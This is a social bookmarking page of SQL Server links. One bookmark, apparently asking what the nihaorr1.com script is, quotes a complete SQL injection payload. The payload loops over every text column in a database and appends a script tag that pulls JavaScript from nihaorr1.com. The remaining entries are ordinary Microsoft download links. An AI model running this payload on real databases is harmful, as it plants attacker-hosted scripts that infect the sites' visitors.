public marks

PUBLIC MARKS with tags "sql server" & microsoft

2008

Anyone know about www.nihaorr1.com/1.js? - IIS.net

by night.kame (via)

DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update [' @T '] set [' @C ']=rtrim(convert(varchar'[' @C '])) ''<script src=nihaorr1.com/1.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T'@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Avec SQL Server, la vie est plus simple.

1969

Download details: Access Database Synchronizer

by HandySolo
Microsoft SQL Server 2005 Everywhere Edition Access Database Synchronizer provides a way to synchronize data between Microsoft Access database on a desktop and Microsoft SQL Server 2005 Everywhere Edition database on a device

Download details: SQL Server 2005 Books Online (April 2006)

by HandySolo
Download an updated version of the documentation and tutorials for Microsoft SQL Server 2005. See the "Additional Information" section for an update on SQL Server Express Books Online.

PUBLIC TAGS related to tag "sql server"

access +   ASP +   injection SQL +   microsoft +   reference +   sync +  

Active users

night.kame
last mark : 26/04/2008 13:58

HandySolo
last mark : 31/12/1969 17:00